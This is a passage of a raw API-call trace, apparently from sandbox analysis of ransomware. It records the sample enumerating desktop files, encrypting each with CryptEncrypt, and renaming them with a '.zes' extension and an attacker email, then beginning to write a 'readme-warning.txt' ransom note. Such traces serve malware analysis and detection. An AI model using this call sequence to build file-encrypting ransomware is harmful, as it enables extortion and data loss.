SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.437] ReadFile (in: hFile=0x130, lpBuffer=0x2140020, nNumberOfBytesToRead=0x11394, lpNumberOfBytesRead=0x23ff504, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff504*=0x11394, lpOverlapped=0x0) returned 1 [0134.438] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0x113a0, dwBufLen=0x113a0 | out: pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0x113a0) returned 1 [0134.439] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.439] WriteFile (in: hFile=0x130, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x113a0, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff4f8*=0x113a0, lpOverlapped=0x0) returned 1 [0134.439] CryptDestroyKey (hKey=0x546488) returned 1 [0134.439] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x11484, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.439] SetEndOfFile (hFile=0x130) returned 1 [0134.442] GetProcessHeap () returned 0x520000 [0134.442] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.442] GetProcessHeap () returned 0x520000 [0134.442] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.443] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\C OQSp3lrPEA6lKyBv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\c oqsp3lrpea6lkybv.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\C OQSp3lrPEA6lKyBv.bmp.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\c oqsp3lrpea6lkybv.bmp.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.448] CloseHandle (hObject=0x130) returned 1 [0134.489] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.489] FindNextFileW (in: hFindFile=0x546448, lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfef9710, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0xf96f89d0, ftLastAccessTime.dwHighDateTime=0x1d5deae, ftLastWriteTime.dwLowDateTime=0xf96f89d0, ftLastWriteTime.dwHighDateTime=0x1d5deae, nFileSizeHigh=0x0, nFileSizeLow=0x5ddf, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="O7GsOEI.swf", cAlternateFileName="")) returned 1 [0134.489] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\O7GsOEI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\o7gsoei.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0134.490] GetProcessHeap () returned 0x520000 [0134.490] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.490] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.490] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff518 | out: lpNewFilePointer=0x0) returned 1 [0134.490] WriteFile (in: hFile=0x130, lpBuffer=0x23ff528*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff528*, lpNumberOfBytesWritten=0x23ff4f8*=0x1, lpOverlapped=0x0) returned 1 [0134.500] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.500] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.500] GetProcessHeap () returned 0x520000 [0134.500] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.500] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff4e0*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff4e0*=0x40) returned 1 [0134.500] CryptDestroyKey (hKey=0x546488) returned 1 [0134.500] WriteFile (in: hFile=0x130, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ff4f8*=0x40, lpOverlapped=0x0) returned 1 [0134.501] WriteFile (in: hFile=0x130, lpBuffer=0x23ff500*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff500*, lpNumberOfBytesWritten=0x23ff4f8*=0x4, lpOverlapped=0x0) returned 1 [0134.501] WriteFile (in: hFile=0x130, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff4f8*=0x10, lpOverlapped=0x0) returned 1 [0134.501] WriteFile (in: hFile=0x130, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ff4f8*=0x80, lpOverlapped=0x0) returned 1 [0134.501] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff520 | out: lpNewFilePointer=0x0) returned 1 [0134.501] WriteFile (in: hFile=0x130, lpBuffer=0x23ff510*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff510*, lpNumberOfBytesWritten=0x23ff4f8*=0x8, lpOverlapped=0x0) returned 1 [0134.501] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.501] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.501] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.501] ReadFile (in: hFile=0x130, lpBuffer=0x2140020, nNumberOfBytesToRead=0x5ddf, lpNumberOfBytesRead=0x23ff504, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff504*=0x5ddf, lpOverlapped=0x0) returned 1 [0134.502] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0x5de0, dwBufLen=0x5de0 | out: pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0x5de0) returned 1 [0134.502] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.502] WriteFile (in: hFile=0x130, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x5de0, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff4f8*=0x5de0, lpOverlapped=0x0) returned 1 [0134.502] CryptDestroyKey (hKey=0x546488) returned 1 [0134.502] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x5eb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.502] SetEndOfFile (hFile=0x130) returned 1 [0134.505] GetProcessHeap () returned 0x520000 [0134.505] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.505] GetProcessHeap () returned 0x520000 [0134.505] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.505] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\O7GsOEI.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\o7gsoei.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\O7GsOEI.swf.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\o7gsoei.swf.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.508] CloseHandle (hObject=0x130) returned 1 [0134.508] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.508] FindNextFileW (in: hFindFile=0x546448, lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71b17e10, ftCreationTime.dwHighDateTime=0x1d5e4ec, ftLastAccessTime.dwLowDateTime=0xadd86a10, ftLastAccessTime.dwHighDateTime=0x1d5da39, ftLastWriteTime.dwLowDateTime=0xadd86a10, ftLastWriteTime.dwHighDateTime=0x1d5da39, nFileSizeHigh=0x0, nFileSizeLow=0xd76c, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="Pef90osST9zF.mp4", cAlternateFileName="PEF90O~1.MP4")) returned 1 [0134.509] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\Pef90osST9zF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\pef90osst9zf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0134.509] GetProcessHeap () returned 0x520000 [0134.509] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.509] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.509] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff518 | out: lpNewFilePointer=0x0) returned 1 [0134.509] WriteFile (in: hFile=0x130, lpBuffer=0x23ff528*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff528*, lpNumberOfBytesWritten=0x23ff4f8*=0x4, lpOverlapped=0x0) returned 1 [0134.510] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.510] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.510] GetProcessHeap () returned 0x520000 [0134.510] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.510] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff4e0*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff4e0*=0x40) returned 1 [0134.510] CryptDestroyKey (hKey=0x546488) returned 1 [0134.510] WriteFile (in: hFile=0x130, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ff4f8*=0x40, lpOverlapped=0x0) returned 1 [0134.511] WriteFile (in: hFile=0x130, lpBuffer=0x23ff500*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff500*, lpNumberOfBytesWritten=0x23ff4f8*=0x4, lpOverlapped=0x0) returned 1 [0134.511] WriteFile (in: hFile=0x130, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff4f8*=0x10, lpOverlapped=0x0) returned 1 [0134.511] WriteFile (in: hFile=0x130, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ff4f8*=0x80, lpOverlapped=0x0) returned 1 [0134.511] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff520 | out: lpNewFilePointer=0x0) returned 1 [0134.512] WriteFile (in: hFile=0x130, lpBuffer=0x23ff510*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff510*, lpNumberOfBytesWritten=0x23ff4f8*=0x8, lpOverlapped=0x0) returned 1 [0134.512] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.512] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.512] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.512] ReadFile (in: hFile=0x130, lpBuffer=0x2140020, nNumberOfBytesToRead=0xd76c, lpNumberOfBytesRead=0x23ff504, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff504*=0xd76c, lpOverlapped=0x0) returned 1 [0134.512] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0xd770, dwBufLen=0xd770 | out: pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0xd770) returned 1 [0134.513] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.513] WriteFile (in: hFile=0x130, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xd770, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff4f8*=0xd770, lpOverlapped=0x0) returned 1 [0134.513] CryptDestroyKey (hKey=0x546488) returned 1 [0134.513] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0xd844, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.513] SetEndOfFile (hFile=0x130) returned 1 [0134.516] GetProcessHeap () returned 0x520000 [0134.517] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.517] GetProcessHeap () returned 0x520000 [0134.517] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.517] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\Pef90osST9zF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\pef90osst9zf.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\Pef90osST9zF.mp4.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\pef90osst9zf.mp4.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.521] CloseHandle (hObject=0x130) returned 1 [0134.521] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.521] FindNextFileW (in: hFindFile=0x546448, lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b5be80, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x55636b10, ftLastAccessTime.dwHighDateTime=0x1d5e244, ftLastWriteTime.dwLowDateTime=0x55636b10, ftLastWriteTime.dwHighDateTime=0x1d5e244, nFileSizeHigh=0x0, nFileSizeLow=0xec07, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="zeCGssAJsgRZgGpoHCS.swf", cAlternateFileName="ZECGSS~1.SWF")) returned 1 [0134.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\zeCGssAJsgRZgGpoHCS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\zecgssajsgrzggpohcs.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0134.522] GetProcessHeap () returned 0x520000 [0134.522] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.522] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.522] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff518 | out: lpNewFilePointer=0x0) returned 1 [0134.522] WriteFile (in: hFile=0x130, lpBuffer=0x23ff528*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff528*, lpNumberOfBytesWritten=0x23ff4f8*=0x9, lpOverlapped=0x0) returned 1 [0134.523] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.523] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.523] GetProcessHeap () returned 0x520000 [0134.523] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.523] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff4e0*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff4e0*=0x50) returned 1 [0134.523] CryptDestroyKey (hKey=0x546488) returned 1 [0134.523] WriteFile (in: hFile=0x130, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ff4f8*=0x50, lpOverlapped=0x0) returned 1 [0134.523] WriteFile (in: hFile=0x130, lpBuffer=0x23ff500*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff500*, lpNumberOfBytesWritten=0x23ff4f8*=0x4, lpOverlapped=0x0) returned 1 [0134.523] WriteFile (in: hFile=0x130, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff4f8*=0x10, lpOverlapped=0x0) returned 1 [0134.523] WriteFile (in: hFile=0x130, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ff4f8*=0x80, lpOverlapped=0x0) returned 1 [0134.524] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff520 | out: lpNewFilePointer=0x0) returned 1 [0134.524] WriteFile (in: hFile=0x130, lpBuffer=0x23ff510*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x23ff510*, lpNumberOfBytesWritten=0x23ff4f8*=0x8, lpOverlapped=0x0) returned 1 [0134.524] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff4fc | out: phKey=0x23ff4fc*=0x546488) returned 1 [0134.524] CryptSetKeyParam (hKey=0x546488, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.524] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.524] ReadFile (in: hFile=0x130, lpBuffer=0x2140020, nNumberOfBytesToRead=0xec07, lpNumberOfBytesRead=0x23ff504, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff504*=0xec07, lpOverlapped=0x0) returned 1 [0134.524] CryptEncrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0xec10, dwBufLen=0xec10 | out: pbData=0x2140020*, pdwDataLen=0x23ff4e0*=0xec10) returned 1 [0134.525] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.525] WriteFile (in: hFile=0x130, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xec10, lpNumberOfBytesWritten=0x23ff4f8, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff4f8*=0xec10, lpOverlapped=0x0) returned 1 [0134.526] CryptDestroyKey (hKey=0x546488) returned 1 [0134.526] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0xecf4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.526] SetEndOfFile (hFile=0x130) returned 1 [0134.529] GetProcessHeap () returned 0x520000 [0134.529] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.529] GetProcessHeap () returned 0x520000 [0134.529] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.529] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\zeCGssAJsgRZgGpoHCS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\zecgssajsgrzggpohcs.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\zeCGssAJsgRZgGpoHCS.swf.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\zecgssajsgrzggpohcs.swf.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.532] CloseHandle (hObject=0x130) returned 1 [0134.532] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.532] FindNextFileW (in: hFindFile=0x546448, lpFindFileData=0x23ff588 | out: lpFindFileData=0x23ff588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b5be80, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x55636b10, ftLastAccessTime.dwHighDateTime=0x1d5e244, ftLastWriteTime.dwLowDateTime=0x55636b10, ftLastWriteTime.dwHighDateTime=0x1d5e244, nFileSizeHigh=0x0, nFileSizeLow=0xec07, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="zeCGssAJsgRZgGpoHCS.swf", cAlternateFileName="ZECGSS~1.SWF")) returned 0 [0134.533] GetProcessHeap () returned 0x520000 [0134.533] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.533] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff4e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546488) returned 1 [0134.533] CryptDecrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588, pdwDataLen=0x23ff550 | out: pbData=0x535588, pdwDataLen=0x23ff550) returned 1 [0134.533] CryptDestroyKey (hKey=0x546488) returned 1 [0134.533] GetProcessHeap () returned 0x520000 [0134.533] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5355d0 [0134.533] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff4e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546488) returned 1 [0134.533] CryptDecrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5355d0, pdwDataLen=0x23ff550 | out: pbData=0x5355d0, pdwDataLen=0x23ff550) returned 1 [0134.533] CryptDestroyKey (hKey=0x546488) returned 1 [0134.533] GetProcessHeap () returned 0x520000 [0134.533] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x56e0e8 [0134.533] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff4e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546488) returned 1 [0134.533] CryptDecrypt (in: hKey=0x546488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56e0e8, pdwDataLen=0x23ff550 | out: pbData=0x56e0e8, pdwDataLen=0x23ff550) returned 1 [0134.533] CryptDestroyKey (hKey=0x546488) returned 1 [0134.533] wsprintfW (in: param_1=0x23fe52c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\readme-warning.txt") returned 100 [0134.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ohry5r3zh\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 